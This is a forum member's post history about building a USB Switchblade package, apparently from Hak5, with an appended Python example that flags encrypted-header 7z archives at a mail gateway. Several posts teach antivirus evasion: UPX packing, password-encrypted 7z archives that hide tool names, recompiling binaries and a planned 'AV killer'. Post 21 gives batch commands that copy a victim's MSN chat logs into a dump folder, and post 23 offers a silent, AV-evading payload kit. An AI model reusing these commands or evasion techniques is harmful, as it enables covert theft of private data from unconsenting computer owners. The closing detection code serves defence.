
Gandalf the l33er

Active Members
  • Posts: 48
  • Joined
  • Last visited
Everything posted by Gandalf the l33er

  1. You should try to search, and read some books on computers, or read about it on the internet. You have to have solid knowledge about computers to understand this fully.
  2. For some reason though, when I do not unhide them, they can still be executed. I think that the only problem when hiding executables is that some programs won't view the files - which is the whole point of hidden files. They should still be able to execute.
  3. I have compressed ALL files in 7zBlade with UPX, and it also prevents AV from detecting the "tools", sometimes even when they are run.
  4. > Well... I still prefer .rar, but you know that :p Though I don't think that there are many AVs that will scan .7z properly, simply because it isn't really a much-used format...

     Yeah, I know. And even if they scanned, they wouldn't find anything, because even the file _names_ are encrypted. Btw: I could insert DontDetectMeStupidAV in the middle of all filenames to disable AV detection by name :-D
  5. Yeah, actually the 7z format is the best on the market for many applications! You should try 7-zip.
  6. > That's not entirely true. A zipped file with a single layer of encryption still exposes the file names in the archive. If the scanner is set to search for certain file types (vbs, scr, bat, etc.), it will delete the file. This is particularly true when sending archives through email. The one way to combat this is to zip the files, encrypt, zip the zip, encrypt. Then the scanner only sees the second encrypted zip file.

     You are right, that problem applies to Zip files. But not to 7z files, especially not when you check the "encrypt filenames" button. If you try to open the image in 7-zip, you will be prompted for the PW before the contents are shown - not only when you extract. So the AV can't detect the harmful files in the archive, only the files extracted to %temp%devices, and it can for sure NOT track back where the files were extracted from (which is nice when you are "fixing" a friend's computer: they see the virus was located on the C: drive, not on your thumb drive).
  7. Any modern AV monitors _constantly_ for the opening of files - vbs, doc, exe and many more file types - and _before_ they are opened, they are scanned. After they are opened, memory is scanned every x milliseconds to check if any process created a malicious thread or contains a malicious file. So, at the moment the AV gets to know the .exe in its definition file, the only thing you can do is to obscure it with UPX.
  8. You are right v'cent. I've made a new version, it is about 1/5 MB and finishes in 19 seconds. Scroll up to the first post to DL.
  9. Just to clarify: C is used for OOP, but OOP is just a lot simpler and more powerful in C++. Actually, I think C is much more straightforward to learn than C++; think about teaching a n00b about operator overloading 8-)
  10. V'cent, sablefoxx is right. The executable will be decrypted into memory at _some_ point, and the AV will grab it. The only other solutions are making a rootkit or recompiling the source with different settings/added dummy code.
  11. It is very hard... I _have_ compressed all the files, but as soon as they are run, the memory image in RAM is the same as if they were not compressed. The only way of making them undetectable is to recompile them with a lot of unused functions (which only exist to change the binary pattern) added. The problem is that many of the apps are commercial or non-open-source, so recompiling isn't that simple. If they should be hidden from Task Manager, the only _easy_ way is to make them services, which also needs recompiling. There is one other possibility: a rootkit. But I am not a H4xX0R, I'm only a _1337_ h4xX0r. Maybe you can ask the good folks at Sony if you need a rootkit :P Which executables does your AV detect (btw I AM planning to include an AV killer (maybe hexlax's, as soon as he makes an AV-kill-only version))?
  12. Yes of course, why not? Maybe because encrypting changes the bit pattern...
  13. The AV finds viruses by looking at the bit layout... try to modify the applications by packing/unpacking them with upx, http://upx.sourceforge.net/. Open a cmd, cd to the folder containing the files and upx.exe, enter upx -9 * to compress all files as much as possible, or upx -d * to decompress.
  14. Yes, | sends the output of the left-side command to the right-side command. A very common use of it is cat largefile.txt | more , which displays the file in "screens", using the utility more.exe. Another way to say it: (taken from http://www.infionline.net/~wtnewton/batch/batguide.html)
  15. Try 7-Zip. http://7-zip.org/. It zips better than many other programs, extracts about all formats, and is free. I've used the command-line version in my project http://forums.hak5.org/index.php/topic,8347.0.html. I strongly recommend it. After installing, just right-click the file -> 7-Zip -> Extract Here.
  16. Why not just google it before bothering us with it? Try to google autorun.inf or launchu3.exe
  17. He probably modded the CD partition as described in the switchblade thread.. Look around, you'll find it.
  18. It's indeed a very nice package hexlax, mad_props to ya! But I like to keep it as small as possible, so I will wait till you have made a "light" version that only kills AV. I've updated my package quite a bit, added an MSN Messenger chatlog stealer and made the whole thing a lot more customizable. See the first post for details.
  19. I don't think it's possible; if possible, you would have to sort of reflash the controller chip...
  20. According to Nirsoft, http://www.nirsoft.net/utils/mspass.html should work with AOL.
  21. I decided to come up with something new. This package first puts the dir to the messenger chat history folder in a text file (couldn't see any elegant way to do it), and then reads the text file and puts the dir in a var. Then it copies the chatlog. Needed file: http://www.myupload.dk/showfile/9418f7520.exe/

      Commands:

          .\MsnHistory.exe>msnlogdir.txt
          Set /P MSNLOG=<msnlogdir.txt
          del msnlogdir.txt
          md WIP\dump\%computername%\Chatlog
          xcopy /E /C /H /Y /I "%MSNLOG%" "WIP\dump\%computername%\Chatlog"

      What do you think? (the little cmdline app is a modded version of some code from some forum)
  22. I'll include http://forums.hak5.org/index.php/topic,8319.0.html as soon as it gets released. I've created a drop with the files at http://drop.io/hak5files. Anybody can add files (hacks and similar) if they wish to. The password is Hak5Rulez.
  23. Dear everybody. Just finished a version of the USB Switchblade where all the files are stored in a 7zip file. The password for the file is haxx0r. The advantage is that virus scanners can't find harmful files inside an encrypted archive, + smaller overall size (around 1 MB). It works no matter where you place it, in any folder on any drive.

      Files included:

      Start.vbs: Runs run.bat in "silent" mode, VERY silent, NO black popups are shown.
      Run.bat: Decrypts and extracts image.7z using 7z.exe (7-zip command-line version) and runs the specified commands.
      7z.exe: 7-zip CLI. (http://www.7-zip.org/)
      image.7z: A 7z archive encrypted with the password "haxx0r", containing the bin files.

      NEWEST version: ONLY 560 kb! Uses %temp% and finishes in about 19 seconds! Includes MSN chatlog stealer. Direct link
      OLD version: Myupload
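Posts 6 and 18 argue over what a scanner can see inside a 7z archive whose file names are encrypted. The file layout settles the practical question: the 32-byte signature header and the type byte of the "next header" are never encrypted, so a scanner that cannot read the names can still tell that the header is an encoded stream and that the 7zAES coder was used, and many mail gateways quarantine exactly that. The following is an added example written for this page, not code from the thread or from 7-Zip: it classifies a .7z file from those unencrypted bytes. The sample archives it builds are constructed, abbreviated stand-ins (only the fields the check reads are meaningful), and the AES-coder test is a byte-string heuristic rather than a full header parser.

```python
"""Classify a .7z file by whether a scanner can read its header (the file names).

Added example, not from the forum thread or from 7-Zip. It reads only the fixed
32-byte signature header and the first bytes of the "next header". The sample
archives built below are constructed stand-ins, not real 7-Zip output.
"""
import struct
import zlib

SIGNATURE = b"7z\xbc\xaf\x27\x1c"        # 37 7A BC AF 27 1C, always in clear
K_HEADER = 0x01                           # plain header: file names are readable
K_ENCODED_HEADER = 0x17                   # header is itself a packed stream
LZMA_CODER_ID = b"\x03\x01\x01"           # plain compression (header compression default)
AES_CODER_ID = b"\x06\xf1\x07\x01"        # 7zAES coder: written by "encrypt file names"


def classify_7z(data: bytes) -> str:
    """Return 'not-7z', 'truncated', 'bad-crc', 'plain-header',
    'compressed-header' or 'encrypted-header' for the given file bytes."""
    if len(data) < 32 or data[:6] != SIGNATURE:
        return "not-7z"
    # Start header CRC covers the 20 bytes after it (offset, size, CRC of next header).
    (start_crc,) = struct.unpack_from("<I", data, 8)
    if zlib.crc32(data[12:32]) & 0xFFFFFFFF != start_crc:
        return "bad-crc"
    nh_offset, nh_size, nh_crc = struct.unpack_from("<QQI", data, 12)
    begin = 32 + nh_offset                # offset is relative to end of signature header
    end = begin + nh_size
    if nh_size == 0 or end > len(data):
        return "truncated"
    next_header = data[begin:end]
    if zlib.crc32(next_header) & 0xFFFFFFFF != nh_crc:
        return "bad-crc"
    kind = next_header[0]
    if kind == K_HEADER:
        return "plain-header"
    if kind == K_ENCODED_HEADER:
        # Heuristic: an encoded header that names the 7zAES coder was produced with
        # "encrypt file names"; one that only lists LZMA is merely compressed.
        return "encrypted-header" if AES_CODER_ID in next_header else "compressed-header"
    return "not-7z"


def build_7z(next_header: bytes, packed: bytes = b"") -> bytes:
    """Constructed minimal archive: signature header, packed streams, next header."""
    tail = struct.pack("<QQI", len(packed), len(next_header),
                       zlib.crc32(next_header) & 0xFFFFFFFF)
    start_crc = struct.pack("<I", zlib.crc32(tail) & 0xFFFFFFFF)
    return SIGNATURE + bytes([0, 4]) + start_crc + tail + packed + next_header


# Constructed headers (abbreviated; real 7-Zip headers carry many more properties).
# Plain kHeader followed by stand-in bytes that include a visible UTF-16 file name.
PLAIN_HEADER = bytes([K_HEADER, 0x05]) + "evil.vbs".encode("utf-16-le") + b"\x00\x00"
# kEncodedHeader whose (abbreviated) coder list names only LZMA.
ENCODED_LZMA = (bytes([K_ENCODED_HEADER, 0x06, 0x00, 0x01, 0x00, 0x07, 0x0B, 0x01, 0x00,
                       0x01, 0x23]) + LZMA_CODER_ID)
# kEncodedHeader whose coder list names 7zAES followed by LZMA.
ENCODED_AES = (bytes([K_ENCODED_HEADER, 0x06, 0x00, 0x01, 0x00, 0x07, 0x0B, 0x01, 0x00,
                      0x02, 0x24]) + AES_CODER_ID + bytes([0x23]) + LZMA_CODER_ID)


def gateway_policy(data: bytes) -> str:
    """What a scanner that cannot read names can still decide from the layout."""
    verdict = classify_7z(data)
    if verdict == "plain-header":
        return "scan-contents"            # names (and types) are readable, scan normally
    if verdict == "encrypted-header":
        return "quarantine"               # contents hidden: block or hold for review
    if verdict == "compressed-header":
        return "decompress-and-scan"      # header is LZMA only, unpack it then scan
    return "reject"                       # not 7z, truncated or corrupt


if __name__ == "__main__":
    for label, sample in [("plain", build_7z(PLAIN_HEADER)),
                          ("compressed", build_7z(ENCODED_LZMA, b"\x00" * 16)),
                          ("encrypted", build_7z(ENCODED_AES, b"\x5a" * 40))]:
        print(f"{label:11} {classify_7z(sample):18} -> {gateway_policy(sample)}")
```

The signature header and the type byte are the parts 7-Zip cannot hide, so this is the check to run at a mail gateway before deciding whether "the scanner can't see anything" is actually a pass: an encoded header that names 7zAES is a reason to quarantine, not to allow.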